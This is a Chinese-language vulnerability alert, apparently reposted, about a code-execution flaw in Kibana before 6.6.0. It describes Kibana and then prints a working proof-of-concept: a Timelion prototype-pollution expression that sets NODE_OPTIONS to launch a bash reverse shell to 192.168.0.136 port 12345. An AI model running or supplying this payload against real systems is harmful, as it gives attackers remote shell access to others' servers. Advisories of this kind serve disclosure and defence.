[漏洞预警] kibana < 6.6.0 代码执行漏洞
Posted 聚源信息安全实验室
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[漏洞预警] kibana < 6.6.0 代码执行漏洞相关的知识,希望对你有一定的参考价值。
Kibana是Elasticsearch的开源数据可视化插件。它在Elasticsearch集群上索引的内容之上提供可视化功能。用户可以在大量数据之上创建条形图,折线图和散点图,或饼图和地图.
Kibana还提供了一个称为Canvas的演示工具,该工具使用户可以创建幻灯片平台,直接从Elasticsearch提取实时数据.
Elasticsearch,Logstash和Kibana的组合(称为“弹性堆栈”(以前称为“ ELK堆栈”))可以作为产品或服务获得. Logstash向Elasticsearch提供输入流以进行存储和搜索,而Kibana访问数据以进行可视化,例如仪表板.Elastic还提供了“ Beats”软件包,可以将其配置为提供有关各种数据库和应用程序技术的预制Kibana可视化效果和仪表板.
Kibana 的使用场景,应该集中在两方面:实时监控与问题分析。
滥用节点中的环境变量,以Kibana为例对RCE开发原型污染
POC: kibana < 6.6.0 .es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.0.136/12345 0>&1");process.exit()//') .props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
以上是关于[漏洞预警] kibana < 6.6.0 代码执行漏洞的主要内容,如果未能解决你的问题,请参考以下文章
高危安全预警Kibana < 6.6.1远程命令执行漏洞(CVE-2019-7609)